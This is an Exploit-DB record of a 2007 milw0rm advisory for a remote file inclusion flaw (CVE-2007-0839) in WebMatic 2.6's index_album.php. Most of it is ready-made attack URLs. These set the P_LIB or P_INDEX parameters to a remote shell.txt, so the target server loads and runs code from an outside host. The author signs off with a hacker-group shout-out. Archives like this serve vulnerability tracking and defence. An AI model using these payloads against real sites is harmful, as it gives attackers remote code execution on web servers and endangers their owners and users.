WebMatic 2.6 index_album.php Remote File Include Vulnerability

2007-02-07T00:00:00
ID EDB-ID:3281
Type exploitdb
Reporter MadNet
Modified 2007-02-07T00:00:00

Description

WebMatic 2.6 (index_album.php) Remote File Include Vulnerability. CVE-2007-0839. Webapps exploit for php platform

                                        
                                            -------------------------------------********************----------------------------------------------------------
#Title : WebMatic 2.6

#Author : MadNet

#Contact : MadNet[at]Hackertr[Dot]org

#S.Page : www.valarsoft.com  :)

--------------------------------------*******************-----------------------------------------------------------


Error1 :  require($P_LIB."lib_album.php");

Error2 :  require($P_INDEX."page_album.inc");


[[RFI]]

http://[target]/[path]/core/index/index_album.php?P_LIB=[Shell]

http://[target]/[path]/core/index/index_album.php?P_INDEX=[Shell]

-------------------------------------------------

Example1 : [Path]/core/index/index_album.php?P_LIB=http://[path]/shell.txt

Example2 : [Path]/core/index/index_album.php?P_INDEX=http://[path]/shell.txt



''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''

-- MadNet From Turkey & Cyber-Sabotger Orgeneral  --


--Thanks Milw0rm

# milw0rm.com [2007-02-07]